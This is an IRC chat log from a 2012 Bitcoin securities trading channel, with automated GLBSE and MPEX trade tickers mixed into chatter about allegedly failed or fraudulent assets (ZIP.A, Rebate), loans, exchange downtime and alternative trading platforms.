[GLBSE] [GIGAMINING] 4 @ 1.1322 = 4.5288 BTC [-] Aug 12 21:43:20 [GLBSE] [GIGAMINING] 12 @ 1.13121001 = 13.5745 BTC [-] Aug 12 21:43:50 me and one other guy saw this all coming together way before and had some inside info Aug 12 21:44:01 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 12 21:44:15 but, its bad for to call a scammer a scammer before he scams :/ people get upset Aug 12 21:44:21 indeed Aug 12 21:44:28 hm what about mathew Aug 12 21:44:34 ? Aug 12 21:44:43 anyway there have been massive logs taken and this guy was being tracked months ago Aug 12 21:44:51 we tought this was going to happen. Aug 12 21:45:11 mathew w is involved in helping set up the scam and take a cut Aug 12 21:45:20 he took some loans too Aug 12 21:45:26 i advised aginst it Aug 12 21:45:42 the 'RSM' matthew or some other one Aug 12 21:45:44 i mean i said giving him loans was not a great idea Aug 12 21:45:51 mathew w Aug 12 21:45:55 ah Aug 12 21:45:55 I said I was not going to comment again, but yea don't judge just yet. Aug 12 21:45:59 dunno whos he Aug 12 21:46:23 Chaang-Noi linky ? Aug 12 21:46:47 iv been up for 30 hours after driving back and was up a mountian yester day, no the day before, got tossed off a atv coming down the mountian yesterday Aug 12 21:46:53 got to 12,300 feet Aug 12 21:46:59 so i do not know the details Aug 12 21:47:06 but we know where jro is Aug 12 21:47:21 kakobrekla i think he means the matthew n wright nut with the bitcoin magazine Aug 12 21:47:22 we have been looking into him and his family for a few months now Aug 12 21:47:24 in SF Chaang-Noi? Aug 12 21:47:32 ahh that guy Aug 12 21:47:35 yeah matthew n wright Aug 12 21:47:40 yes yes Aug 12 21:47:42 the asshat from the forum Aug 12 21:47:42 the forum clown Aug 12 21:47:57 the guy who helped sell the bitcoinica stuff and took the $11,000 Aug 12 21:48:10 [GLBSE] [BMF] 2 @ 0.7 = 1.4 BTC [+] Aug 12 21:48:11 even though the books were cooked... and then deleated :/ Aug 12 21:48:31 bitcoin never ceases to suprise me Aug 12 21:48:36 once i found out what jro and matthew was involved in i pulled out and advized aginst it Aug 12 21:48:52 im glad this shit will finaly kill matthews rep Aug 12 21:49:24 one cannot be too careful these days, even otc ratings mean little Aug 12 21:49:48 i dont have the link but in the thread mathew admits to being paid buy jro and what not Aug 12 21:50:04 deadt might know better, he posted in it and i think even started it Aug 12 21:50:05 so do we get a link to this ? Aug 12 21:50:20 ill try to find it Aug 12 21:50:22 give me some time Aug 12 21:50:24 dont have it Aug 12 21:50:27 im pretty dead Aug 12 21:51:37 hm Aug 12 21:51:45 Chamois salami wasnt bad Aug 12 21:51:47 course i could point out that mpoe-pr was trashing him back in whenever, march Aug 12 21:51:52 i would try goats as well. Aug 12 21:51:54 and people were complaining to me that she's mean Aug 12 21:52:11 and "it's no way to do business". Aug 12 21:52:37 :D Aug 12 21:56:16 [GLBSE] [TYGRR.BOND-P] 4 @ 1.0363 = 4.1452 BTC [+] Aug 12 21:56:18 [GLBSE] [TYGRR.BOND-P] 9 @ 1.0362 = 9.3258 BTC [-] Aug 12 21:56:19 [GLBSE] [TYGRR.BOND-P] 19 @ 1.031 = 19.589 BTC [-] Aug 12 21:56:20 [GLBSE] [TYGRR.BOND-P] 6 @ 1.025 = 6.15 BTC [-] Aug 12 21:56:21 [GLBSE] [TYGRR.BOND-P] 44 @ 1.021 = 44.924 BTC [-] Aug 12 21:56:24 [GLBSE] [GIGAMINING] 4 @ 1.13121 = 4.5248 BTC [-] Aug 12 21:56:26 [GLBSE] [GIGAMINING] 29 @ 1.13111 = 32.8022 BTC [-] Aug 12 21:56:38 had to do some bond work Aug 12 21:56:40 ill look now Aug 12 21:57:35 [GLBSE] [NYAN.C] 83 @ 1 = 83 BTC [+] Aug 12 21:57:39 what was it called, the bitcoindaytrade how was that spelt? Aug 12 21:58:05 bitdaytrade.com Aug 12 21:59:16 [GLBSE] [BDT] 9 @ 1.099 = 9.891 BTC [+] Aug 12 22:00:10 [MPEX] [S.MPOE] 44600 @ 0.00035218 = 15.7072 BTC [-] Aug 12 22:02:07 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Aug 12 22:03:07 so glbsse is down ? Aug 12 22:03:14 HTTP gateway timed out Aug 12 22:03:14 You tried to access the address https://glbse.com/sessions/login, which is currently unavailable. Aug 12 22:03:38 https://bitcointalk.org/index.php?topic=83784.msg999988#msg999988 Aug 12 22:04:04 okay I have gotten some updates regarding JRO Aug 12 22:04:39 there is other stuff scattered but im not in the mood to track it all down Aug 12 22:04:59 he he's seriously sick, like he has to lay in bed sick. That's why he has not responded, he's working towards raising capital to settle his debts and to close down all assets. He's goal is to do it within the next 2-3 days Aug 12 22:06:07 so mnw is involved in bitcoinica, with some dubious "personal loans" (says zhou) "line of credit" (says he) and also in zip/rebate/icehill ? Aug 12 22:06:15 you should have asked about jared kenna back then Chaang-Noi Aug 12 22:06:47 matthew the clown took loans unrelated to bitcoinica too Aug 12 22:07:08 related to the mag and to the hand held crap he is try to make Aug 12 22:07:09 i'd guess he's trying to make ends meet on his magazine venture. Aug 12 22:07:46 well maybe so, but getting people to trust him on fail sucker deals is a bad way to publish a mag Aug 12 22:07:57 has the second one even come out? Aug 12 22:08:30 [GLBSE] [OBSI.HRPT] 9 @ 0.1047 = 0.9423 BTC [+] Aug 12 22:08:50 [GLBSE] [PPT.E] 2 @ 1.18 = 2.36 BTC [-] Aug 12 22:09:07 jro's "magic" looks more to be a scam pimped by matthew more than ever :/ but atleast he will get well and solve everything in a few days lol Aug 12 22:10:00 it's sad, at this rate glbse will have to get a whole new design and launch 3.0 Aug 12 22:10:11 otherwise it becomes more and more glaring how no offerings there are older than six months. Aug 12 22:10:53 just this ipo -> hype -> bust cycle. Aug 12 22:15:31 considering the platform itself in its current form hasn't been around for 6 months, it's hardly surprising most of the issues are younger than that. Aug 12 22:15:49 there is only a hand full of people from 1.0 who made it to 2.0 and will make it to 3.0 .... Aug 12 22:16:04 teek was on 1.0 who else is still around? Aug 12 22:19:20 I was on 1.0 Aug 12 22:19:35 I actually joined in before TyGrr came to 1.0 xD Aug 12 22:19:41 I was there back when LIF was traded Aug 12 22:20:08 o ya lif Aug 12 22:20:16 i recall reading up on that. jesus what a mess. Aug 12 22:20:34 that and sensodyne or whatever it was called. Aug 12 22:21:06 Sensodyne? Aug 12 22:21:08 lol Aug 12 22:21:12 What is that Aug 12 22:21:20 toothpaste Aug 12 22:21:24 [MPEX] [S.MPOE] 9731 @ 0.00035218 = 3.4271 BTC [-] Aug 12 22:21:26 [MPEX] [S.MPOE] 9869 @ 0.00036042 = 3.557 BTC [+] Aug 12 22:21:35 Someone was trying to sell sensodyne on the glbse?? Aug 12 22:21:51 no i was just saying, lif and this other failed mining venture Aug 12 22:22:00 sensodyne or w/e it was called, something like that Aug 12 22:22:07 superdyne Aug 12 22:22:12 i mean who had an asset on glbse 1.0 that did not turn out to be a scammer other than teek and myself, im sure there must be others Aug 12 22:22:23 i'm not so sure. Aug 12 22:23:07 only teek and i were not scammers and still have assets? thats a shockinly high fail rate :/ Aug 12 22:23:44 fpga.contract Aug 12 22:23:58 skepsydine! Aug 12 22:24:11 fpga.contract is prahistoric Aug 12 22:24:22 jro is so sick he is on skype :) Aug 12 22:24:31 https://bitcointalk.org/index.php?topic=8167.0 Aug 12 22:25:34 thats right kakobreklaa Aug 12 22:26:07 Puremining maybe. IBB i sold Aug 12 22:27:54 bitcointorrentz? that's been around awhile. Aug 12 22:28:05 wasn't BMMO and JLP-BMD 1.0 Aug 12 22:28:11 yea BitcoinTorrentx Aug 12 22:28:14 Puremining was not 1.0 Aug 12 22:28:32 but MergedMining was right? Aug 12 22:28:50 ehm was FPGA.contract also 1.0? Aug 12 22:29:31 how could it ? Aug 12 22:29:35 fpga wasn't around then Aug 12 22:29:41 I'd say yes for merged. Aug 12 22:29:52 BMMO to. Aug 12 22:30:22 glad there was morethan 2 still around Aug 12 22:30:45 fpga.contract has the old style contract, so I'd say yes for that one. Aug 12 22:31:16 I think so as well :P Aug 12 22:31:34 can't think of any else that's actually still alove Aug 12 22:32:23 I don't know, most startups fail in the real world. Why would BTCLand be any different? Aug 12 22:34:01 ColdHardMetal most irl startups fail somewhat differently from the preferred modes of btcland Aug 12 22:34:08 which seems to be either "busy" or "sick". Aug 12 22:34:11 scams and fail not the same Aug 12 22:34:20 lol, fair enough. Aug 12 22:34:22 the last start-up to fail cause of owner getting sick was Apple, Inc. Aug 12 22:35:14 took > 30 years and you can still get out at a sane discount. Aug 12 22:36:44 alright, bedtime. goodnight all. Aug 12 22:37:01 night Aug 12 22:39:36 [GLBSE] [MOVETO.FUND] 2 @ 1.065 = 2.13 BTC [-] Aug 12 22:41:00 in 20 minutes dividend payout of PGM, still some shares for sale Aug 12 22:43:45 [GLBSE] [MOVETO.FUND] 6 @ 1.069 = 6.414 BTC [+] Aug 12 22:43:47 [GLBSE] [MOVETO.FUND] 1 @ 1.07 BTC [+] Aug 12 22:45:12 [GLBSE] [PUREMINING] 1 @ 0.15439999 BTC [+] Aug 12 22:50:33 is BitcoinINV aroind? Aug 12 22:50:40 is BitcoinINV around? Aug 12 22:52:06 [GLBSE] [GOLD] 24 @ 0.00920001 = 0.2208 BTC [-] Aug 12 22:52:36 [MPEX] [F.GIGA.ETF] 6200 @ 0.00111814 = 6.9325 BTC [+] Aug 12 22:53:59 [GLBSE] [PUREMINING] 2 @ 0.15439999 = 0.3088 BTC [+] Aug 12 22:57:23 [GLBSE] [JTME] 1 @ 0.9997 BTC [-] Aug 12 22:57:24 [GLBSE] [JTME] 1 @ 1 BTC [+] Aug 12 22:59:27 [GLBSE] [JTME] 3 @ 1 = 3 BTC [+] Aug 12 22:59:50 [GLBSE] [NYAN.B] 50 @ 1 = 50 BTC [-] Aug 12 23:04:56 [MPEX] [F.GIGA.ETF] 4313 @ 0.0011304 = 4.8754 BTC [+] Aug 12 23:04:57 [MPEX] [F.GIGA.ETF] 3942 @ 0.001135 = 4.4742 BTC [+] Aug 12 23:04:59 [MPEX] [F.GIGA.ETF] 3945 @ 0.00113801 = 4.4894 BTC [+] Aug 12 23:06:20 [GLBSE] [BITCOINMINV] 20 @ 0.125 = 2.5 BTC Aug 12 23:06:28 ohh mann glbse is slow as molasses today Aug 12 23:07:05 yep Aug 12 23:07:28 yep - just signed on for first time in a few days Aug 12 23:07:34 it sucks Aug 12 23:09:24 [GLBSE] [NYAN.C] 3 @ 1 = 3 BTC [+] Aug 12 23:11:26 Eh, I sign in daily Aug 12 23:11:44 I have all but given up on glbse weeks ago Aug 12 23:11:53 Why? Aug 12 23:12:02 if you have to ask... Aug 12 23:12:20 it is a heaping pile of crap Aug 12 23:12:22 no support Aug 12 23:12:32 dividend paid for PGM Aug 12 23:12:41 I always get almost instant support... Aug 12 23:13:19 Well, relatively to most services, not instant litteraly Aug 12 23:14:15 move to mpex JWU42 Aug 12 23:14:21 ordo you even have an acct there ? Aug 12 23:14:29 nope Aug 12 23:14:43 so get one! Aug 12 23:14:47 there is a 3rd option now Aug 12 23:14:48 25 BTC is too costly for me - even before the price of BTC doubled Aug 12 23:14:53 and then some Aug 12 23:15:31 the difficulty in using mpex means few investors Aug 12 23:15:39 [GLBSE] [BITCOINMINV] 10 @ 0.125 = 1.25 BTC Aug 12 23:15:43 with stable Btc price these investments were more intriguing - much less so now Aug 12 23:15:46 Chaang-Noi whats the 3rd option Aug 12 23:16:06 just 20. Aug 12 23:16:15 but then again... it pays for support. and for a site that's not down. or slow. Aug 12 23:16:30 and if you trade 2.5k btc total you'll actually make it back. Aug 12 23:16:44 teek https://cryptostocks.com/securities Aug 12 23:16:47 its new Aug 12 23:16:53 i think that's 4th or 5th Aug 12 23:16:58 wasn't there some other itcsomething ? Aug 12 23:17:13 [GLBSE] [GIGAMINING] 5 @ 1.1399 = 5.6995 BTC [+] Aug 12 23:17:22 oh yeah i saw that Aug 12 23:17:31 forgot about it Aug 12 23:17:32 Kronos... Aug 12 23:17:35 was... Aug 12 23:18:23 nono Aug 12 23:18:25 another one. Aug 12 23:18:28 it-bit ? Aug 12 23:18:53 Chaang-Noi: who is behind cryptostocks? Aug 12 23:19:14 vericruz or that one exchange i was told Aug 12 23:19:19 not 100% sure Aug 12 23:19:26 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC Aug 12 23:19:35 iv been busy lately Aug 12 23:19:53 A service of Vircurex Aug 12 23:20:12 [GLBSE] [BITCOINMINV] 1 @ 0.125 BTC Aug 12 23:20:27 [MPEX] [F.GIGA.ETF] 455 @ 0.00113801 = 0.5178 BTC [+] Aug 12 23:20:27 [MPEX] [F.GIGA.ETF] 1045 @ 0.00114078 = 1.1921 BTC [+] Aug 12 23:20:58 not much action but hey, gotta start somewhere. Aug 12 23:21:01 looks kinda clean Aug 12 23:21:27 if its nothing at all like vircurex it might have potential Aug 12 23:21:43 interface wise Aug 12 23:22:09 lol Aug 12 23:22:29 i dont think it's possible to make a login based exchange. Aug 12 23:22:32 buyt hey, that's just me. Aug 12 23:22:50 [GLBSE] [FUTUREFUND] 100 @ 0.00011485 = 0.0115 BTC [+] Aug 12 23:28:57 [GLBSE] [FUTUREFUND] 7 @ 0.00011485 = 0.0008 BTC [+] Aug 12 23:31:33 [GLBSE] [FUTUREFUND] 50 @ 0.00011485 = 0.0057 BTC [+] Aug 12 23:31:45 [GLBSE] [BDK.BND] 99 @ 0.102746 = 10.1719 BTC [-] Aug 12 23:32:27 [GLBSE] [YARR] 3 @ 1.492 = 4.476 BTC [-] Aug 12 23:32:29 [GLBSE] [YARR] 2 @ 1.44 = 2.88 BTC [-] Aug 12 23:32:29 [GLBSE] [YARR] 2 @ 1.421 = 2.842 BTC [-] Aug 12 23:32:31 [GLBSE] [YARR] 3 @ 1.39 = 4.17 BTC [-] Aug 12 23:34:30 [GLBSE] [BITBOND] 5 @ 0.3799 = 1.8995 BTC [-] Aug 12 23:34:47 [GLBSE] [PUREMINING] 1 @ 0.15439999 BTC [+] Aug 12 23:45:23 [GLBSE] [GOLD] 24 @ 0.0092 = 0.2208 BTC [-] Aug 12 23:51:10 [GLBSE] [TYGRR.BOND-B] 3 @ 0.1 = 0.3 BTC [+] Aug 12 23:51:11 [GLBSE] [TYGRR.BOND-B] 50 @ 0.1 = 5 BTC [+] Aug 12 23:52:18 [MPEX] [S.BVPS] 929 @ 0.0035 = 3.2515 BTC [-] Aug 12 23:59:25 [GLBSE] [BDT] 3 @ 1.094 = 3.282 BTC [-] Aug 13 00:02:12 okay just had a chat with Jered that will give my message to JRO once he get s home :) Aug 13 00:02:26 so hopefully we will have a direct line between JRO and Nefario soon, so we can get a solution to this mess Aug 13 00:03:34 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC Aug 13 00:04:40 [GLBSE] [NYAN.B] 2 @ 1 = 2 BTC [-] Aug 13 00:04:52 [GLBSE] [OBSI.HRPT] 11 @ 0.1047 = 1.1517 BTC [+] Aug 13 00:06:05 which mess? Aug 13 00:06:22 rebate and JRO Aug 13 00:08:39 and zip.a or is that still alive? Aug 13 00:08:47 Ah, I see... looks inactive... Aug 13 00:08:53 Why is it still around? Aug 13 00:10:52 Although, by looking at the website for bitcoinrebate... the issuer IS giving 1/50000 of revenues per share daily: Nothing. Aug 13 00:11:30 And it's somehow always given on time: Never Aug 13 00:11:38 Talk about being ponctual Aug 13 00:11:46 no point rubbing it in Aug 13 00:12:41 oh, sorry. Did you have shares in it? Aug 13 00:13:21 hi DeaDTerra still interested in some shares? Aug 13 00:13:28 what about the zipconf? Aug 13 00:14:14 sorry all out of liquid capital otherwise I would have gotten some Aug 13 00:14:27 ok np Aug 13 00:22:04 [MPEX] [F.GIGA.ETF] 200 @ 0.00111814 = 0.2236 BTC [-] Aug 13 00:22:05 [MPEX] [S.MPOE] 32200 @ 0.00035541 = 11.4442 BTC [-] Aug 13 00:23:23 so glbse is down? Aug 13 00:23:33 All my moneh!!!! Aug 13 00:24:16 wait, it's not down... Aug 13 00:24:18 yep it done broked Aug 13 00:25:02 oh it works for me again Aug 13 00:25:05 I can still load pages and do stuff Aug 13 00:25:22 Ah, it's a bit slow, maybe some requests just time out on some occasions Aug 13 00:26:03 BTCHero was down for me earlier Aug 13 00:30:01 [GLBSE] [GMVT-BOT] 1 @ 0.1 BTC [-] Aug 13 00:30:11 [GLBSE] [OBSI.HRPT] 438 @ 0.101 = 44.238 BTC [-] Aug 13 00:30:54 [GLBSE] [OBSI.HRPT] 6 @ 0.101 = 0.606 BTC [-] Aug 13 00:31:59 DeaDTerra: You give ASICMINING your seal of approval? Aug 13 00:32:31 [GLBSE] [FOO.PPPPT] 4 @ 1.04 = 4.16 BTC [-] Aug 13 00:32:50 err ASICMINING Aug 13 00:32:56 [GLBSE] [OBSI.HRPT] 9 @ 0.101 = 0.909 BTC [-] Aug 13 00:33:12 [GLBSE] [NYAN.C] 10 @ 1 = 10 BTC [+] Aug 13 00:33:40 [GLBSE] [NYAN.C] 1 @ 1 BTC [+] Aug 13 00:33:46 Yes, though unfortunatly my seal of approval isn't worth much anymore... xD Aug 13 00:34:07 Oh, must be some drama i missed Aug 13 00:34:09 Hopefully JRO will do what's right and restore not only his but also my reputation Aug 13 00:34:11 [GLBSE] [OBSI.HRPT] 170 @ 0.101 = 17.17 BTC [-] Aug 13 00:34:18 Rebate+ZIP.A are frozen Aug 13 00:34:32 pending a buyback Aug 13 00:34:47 what'd be the total value involved ? Aug 13 00:35:31 is there a pertinent thread on bitcointalk? Aug 13 00:37:15 https://bitcointalk.org/index.php?topic=83784.msg999988#msg999988 like Aug 13 00:37:15 It depends full value 5000 BTC, buy back according to contract closer to 3500 BTC Aug 13 00:37:34 [GLBSE] [OBSI.HRPT] 9 @ 0.1047 = 0.9423 BTC [+] Aug 13 00:37:51 [GLBSE] [BIF.BTCST.PPT] 4 @ 1.0443 = 4.1772 BTC [+] Aug 13 00:38:39 [GLBSE] [CPA] 12 @ 0.10296 = 1.2355 BTC [+] Aug 13 00:39:43 so like 40k usd. hopefully the guy wouldn't muck up his name for a midrange car. Aug 13 00:41:01 I could use a new car Aug 13 00:41:02 >,> Aug 13 00:41:31 mircea_popescu: I have had people rob me of 25 dollars Aug 13 00:42:01 ya BTCHero but were they people trying to be like, i dunno, property developers ? Aug 13 00:42:09 so I take it DeaDTerra was covering for him? Is that what i am reading Aug 13 00:42:09 [MPEX] [S.MPOE] 11912 @ 0.00034886 = 4.1556 BTC [-] Aug 13 00:42:20 mircea_popescu: more like drug users Aug 13 00:42:23 well. Aug 13 00:42:52 [GLBSE] [BDK.BND] 2 @ 0.102747 = 0.2055 BTC [+] Aug 13 00:42:55 what i don't seem to get an answer to is if the j kenna guy paid all tradehill deposits ? or not really ? Aug 13 00:42:57 DRAMA ? Aug 13 00:43:04 just the zip thing. Aug 13 00:43:49 zipconf turned out to be shit? Aug 13 00:43:54 and rebate Aug 13 00:43:57 [MPEX] [F.GIGA.ETF] 1500 @ 0.00111814 = 1.6772 BTC [-] Aug 13 00:44:01 Yes I was kind of covering for him, he told me things was delayed and that it would soon be up and running. naively I belived him and as long as he payed the dividends i thought it was okay. This is for ZIP.A Aug 13 00:44:03 i calllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllled it Aug 13 00:44:04 well the owens guy is awol or w/e. Aug 13 00:44:11 rg +1 Aug 13 00:44:16 rg : that's what Chaang-Noi said. you shoudl team up Aug 13 00:44:22 remember when i was like well we should probably get some proof from him Aug 13 00:44:23 like src Aug 13 00:44:26 and like Aug 13 00:44:28 info Aug 13 00:44:30 http://arstechnica.com/tech-policy/2012/08/bitcoinica-users-sue-for-460k-in-lost-bitcoins/ :O Aug 13 00:44:31 and everyone was like no Aug 13 00:44:33 theyre already cool Aug 13 00:44:37 For Rebate he disapeared and I had no contact for a long time then he got back and told me Alberto was now in charge and I have been workign with it ever since to try to make it correct Aug 13 00:45:31 [GLBSE] [NYAN.C] 2 @ 1 = 2 BTC [+] Aug 13 00:45:37 Yes my decisions have might have been questionable but I have always made them for the right reason. Always pushing for justice for the share holders. Aug 13 00:45:47 rg i posted on the forum that his "magic" was bs and made clear mathew w was in the pay of jro for setting up the scam... Aug 13 00:46:11 this was not shock to some Aug 13 00:46:27 [GLBSE] [NYAN.C] 2 @ 1 = 2 BTC [+] Aug 13 00:46:35 DeaDTerra i still don't see why you'd bother from the get go. Aug 13 00:47:12 Well, when I first started with JRO he has a team, he had a vision and a sound idea. So I helped him, I put my ass on the line. I invested heavily into him. Aug 13 00:48:04 honestly Dead, i pull my money out of your fund when you started working with jro and matthew w Aug 13 00:48:06 [GLBSE] [BTC-MINING] 1 @ 1 BTC [+] Aug 13 00:48:10 When then things started to go worse, I thought it was just some development errors it will soon be fixed. The actual truth that a rebate was not being developed and b ZipConf didn't work as intended was not told. Instead they said it's being worked on or being delayed. Aug 13 00:48:10 well Aug 13 00:48:12 it just stunk to me Aug 13 00:48:14 from the beginning Aug 13 00:48:23 all i did was ask people to ask questiions Aug 13 00:48:28 and dead, you were about the only person who i let have my coins Aug 13 00:48:29 before they start handing over their moneyt Aug 13 00:48:30 that's all Aug 13 00:48:34 Well I have learnt, hopefully this will never happen agai for me. Aug 13 00:48:58 i was just about to make a joke Aug 13 00:49:00 Thank you, Feels good to know that people don't doubt my trust even though I did a major fuck up. Aug 13 00:49:09 and realized that a stock trading channel is probably not the best place to make it Aug 13 00:49:13 you obviously aren't aware of how poker is played. Aug 13 00:49:15 hahah xD Aug 13 00:49:18 you drop hands don't prop hands. Aug 13 00:49:38 that reminds me Aug 13 00:49:41 i need to pay a $600 bill Aug 13 00:49:54 [GLBSE] [NYAN.C] 10 @ 1 = 10 BTC [+] Aug 13 00:49:56 Yea, when I realized there were cracks I should have stepped away, instead of trying to improve it trying to force justice and development. Aug 13 00:50:05 learn from that, srsly. Aug 13 00:50:21 [GLBSE] [NASTY] 9 @ 0.55 = 4.95 BTC [-] Aug 13 00:50:22 and everyone should. all this supporting people you aren't married to... srsly. Aug 13 00:50:34 jro and matthew w should not be trusted :/ Aug 13 00:51:00 I will, I will never put my name on something I don't controll, and if I do it has to be clearly stated that I only do x and y. Because with rebate suddenly instead of a team and a massive budget we had a confused investor (that's me) and a single developer. Aug 13 00:51:25 myea. Aug 13 00:51:34 oh well, done is done. It's easy to be smart in retrospect. Aug 13 00:51:56 for good cause in english smart means both like wise and like what you feel on your ass after a good belting. Aug 13 00:53:39 Indeed, I will do my best to try to wrap this up, but considering that's what I have been doing for the last couple of months I don't think it will help much ... sigh Aug 13 00:53:47 ill invest with you again deadt but only after this gets cleared up and that loan to matthew gets taken off the books, i highly doubt he will pay it back Aug 13 00:54:45 [GLBSE] [NYAN.C] 1 @ 1 BTC [+] Aug 13 00:54:48 Indeed, I already have a similar statment from a 6,000 BTC investor. Aug 13 00:55:00 [GLBSE] [BITNODES] 1 @ 0.24 BTC [-] Aug 13 00:55:22 I have been working on selling it off for the last couple of weeks but the liquidity has been very low xD I guess that doesn't matter now anyways, I just hope the investors gets some kind of payment back. Aug 13 00:55:48 actually, is there any evidence of matthew n wright ever paying a loan back ? Aug 13 00:55:56 not wishy-washy lender says is ok. actually paid. Aug 13 00:56:42 DeaDTerra did you talk to copumpkin about buying the loan ? i think he was trying to get a refinance business going Aug 13 00:57:00 No i have not Aug 13 00:57:23 It's 100% loan for maximum of 9 months Aug 13 00:57:34 making it 2,7% a week and it was 1500$ Aug 13 00:58:17 [GLBSE] [NYAN.C] 3 @ 1 = 3 BTC [+] Aug 13 00:59:12 [GLBSE] [OBSI.HRPT] 2 @ 0.1047 = 0.2094 BTC [+] Aug 13 01:00:14 starting when ? Aug 13 01:01:38 20 june Aug 13 01:02:32 so till march ? did you get july coupon ? Aug 13 01:04:43 it's all paid off in the end Aug 13 01:06:07 [GLBSE] [FOO.PPPPT] 2 @ 1.0251 = 2.0502 BTC [-] Aug 13 01:06:08 [GLBSE] [FOO.PPPPT] 31 @ 1.025 = 31.775 BTC [-] Aug 13 01:08:01 [GLBSE] [NYAN.C] 46 @ 1 = 46 BTC [+] Aug 13 01:11:11 [GLBSE] [NYAN.C] 1 @ 1 BTC [+] Aug 13 01:13:22 [GLBSE] [SYNERGY] 1 @ 0.1955 BTC [-] Aug 13 01:13:25 [GLBSE] [MPOE.ETF] 475 @ 1.12 = 532 BTC [+] Aug 13 01:13:26 [GLBSE] [MPOE.ETF] 20 @ 1.12 = 22.4 BTC [+] Aug 13 01:13:58 what do you mean DeaDTerra ? Aug 13 01:14:41 whoa nelly. who did that ? Aug 13 01:15:56 it's all paid at the end of the loan then 3000$ is paid back Aug 13 01:16:31 o no coupons. Aug 13 01:18:12 Well if anyone has bulk volume to sell, I need to purchase more stock Aug 13 01:18:28 [GLBSE] [BITCOINMINV] 11 @ 0.12 = 1.32 BTC [-] Aug 13 01:18:29 ASICMINER? Aug 13 01:18:43 [MPEX] [S.MPOE] 49088 @ 0.00034886 = 17.1248 BTC [-] Aug 13 01:18:44 [MPEX] [S.MPOE] 14800 @ 0.00034826 = 5.1542 BTC [-] Aug 13 01:18:46 [MPEX] [S.MPOE] 3012 @ 0.0003442 = 1.0367 BTC [-] Aug 13 01:18:53 eh, no, no guarantees it will work and deferred Aug 13 01:19:04 I'll skip ASICMINER Aug 13 01:19:11 oki :) Aug 13 01:19:11 so what are you trying to buy ? Aug 13 01:19:17 Already got 30 shares and might only buy a few every now and then Aug 13 01:19:24 But won't put a lot in. Aug 13 01:19:49 Eh, anything with an history of beeing succesful so far Aug 13 01:20:04 JLP-BMD? Aug 13 01:20:07 MergedMining? Aug 13 01:20:10 Fpga.contract Aug 13 01:20:30 https://docs.google.com/spreadsheet/ccc?key=0Aq6Ug2ODt-l2dC13WldWaTBWQVNYZWRwVDgtQmhzUkE#gid=0 Aug 13 01:20:33 haha, mpoe :D Aug 13 01:20:38 have a look at my portfolio :P Aug 13 01:21:35 FPGA, meh, no. Because it's fixed to FPGA and with ASICs coming soon... Aug 13 01:21:51 BMD/MergedMining? I don't know Aug 13 01:22:17 dude, srsly. there's exactly one business in btc world making k's of btc a month. that's mpoe. Aug 13 01:22:25 unlike mining, it's not deprecating. Aug 13 01:22:29 [GLBSE] [COGNITIVE] 14 @ 0.6631 = 9.2834 BTC [-] Aug 13 01:22:35 Where is GBF? On Mpex? Aug 13 01:22:41 on mpex and on glbse Aug 13 01:22:47 [GLBSE] [MPOE.ETF] 475 @ 1.12 = 532 BTC [+] << that. Aug 13 01:23:16 How much in dividend? Aug 13 01:23:30 lemme dig them up Aug 13 01:23:35 GBF is no where, but we plan to register on GLBSE later on possible. Aug 13 01:24:22 https://bitcointalk.org/index.php?topic=64962.60 there, for mpoe results. Aug 13 01:24:25 Hmm, ideally, create one share per (minimum investment value) and split it to current holders Aug 13 01:24:33 Then sell extra shares Aug 13 01:24:51 [GLBSE] [GIGAMINING] 2 @ 1.1399 = 2.2798 BTC [+] Aug 13 01:25:01 the etf reports separately, https://bitcointalk.org/index.php?topic=67535.msg1039612#msg1039612 Aug 13 01:26:14 [GLBSE] [JAH] 4 @ 0.19 = 0.76 BTC [-] Aug 13 01:26:33 what's gbf ? Aug 13 01:26:35 hmm, what are the MPOE? Options? Ah... Aug 13 01:26:47 yeah it's my old options page turned full exchange. Aug 13 01:26:52 [GLBSE] [RAREEARTH] 7 @ 0.00997999 = 0.0699 BTC [+] Aug 13 01:26:57 GBF is Gamma Bitcoin Investment Fund :) Aug 13 01:27:01 Lots of earning on those options it seems Aug 13 01:27:12 in a good month they beat giga hehe Aug 13 01:27:20 on a bad month investors are insulated from loss anyway. Aug 13 01:27:44 http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 read up on how it's set up exactly. Aug 13 01:28:28 o wow, there was a first SR arrest ? Aug 13 01:29:18 [GLBSE] [BTC-MINING] 32 @ 1 = 32 BTC [+] Aug 13 01:29:35 [GLBSE] [NYAN.C] 10 @ 1 = 10 BTC [+] Aug 13 01:30:00 [GLBSE] [NYAN.C] 5 @ 1 = 5 BTC [+] Aug 13 01:30:02 [GLBSE] [GOLD] 2 @ 0.00920001 = 0.0184 BTC [+] Aug 13 01:30:29 link? Aug 13 01:30:41 yes, please link mircea_popescu Aug 13 01:30:46 http://betabeat.com/2012/07/australian-law-enforcement-use-silk-road-at-your-peril/ Aug 13 01:30:51 ty Aug 13 01:30:56 http://www.afp.gov.au/media-centre/news/afp/2012/july/afp-and-Customs-warn-users-of-silk-road.aspx Aug 13 01:32:04 [GLBSE] [JTME] 2 @ 1 = 2 BTC [+] Aug 13 01:32:40 [GLBSE] [MPOE.ETF] 3 @ 1.25 = 3.75 BTC [+] Aug 13 01:32:41 [GLBSE] [MPOE.ETF] 15 @ 1.333333 = 20 BTC [+] Aug 13 01:32:42 [GLBSE] [MPOE.ETF] 100 @ 1.5 = 150 BTC [+] Aug 13 01:32:45 "The requirement for the customer to assemble the weapon also hampers usability" ok this is the stupidest thing i ever hear Aug 13 01:32:54 hehe BTC-Mining was that you ? Aug 13 01:33:41 Yes, I just upped my stake Aug 13 01:33:55 well if it keeps going... Aug 13 01:34:04 it launched at 0.1 if memory serves. or 0.2 or something Aug 13 01:34:20 No, launched at 1? Aug 13 01:34:31 anyway what the fuck is this, who buys guns that they can't dissasemble/reassemble ?! Aug 13 01:34:42 BTC-Mining i was pretty sure it was .1 ? back in the old random allocation days ? Aug 13 01:34:55 smickles you about ? Aug 13 01:35:29 random allocations? Aug 13 01:35:47 I think we're not talking about the same things Aug 13 01:35:52 haha are we ? Aug 13 01:35:59 [GLBSE] [MPOE.ETF] 100 @ 1.5 = 150 BTC [+] << that's what i was talking about. Aug 13 01:36:03 I just noticed there was .ETF just before you asked Aug 13 01:36:18 No, I don't 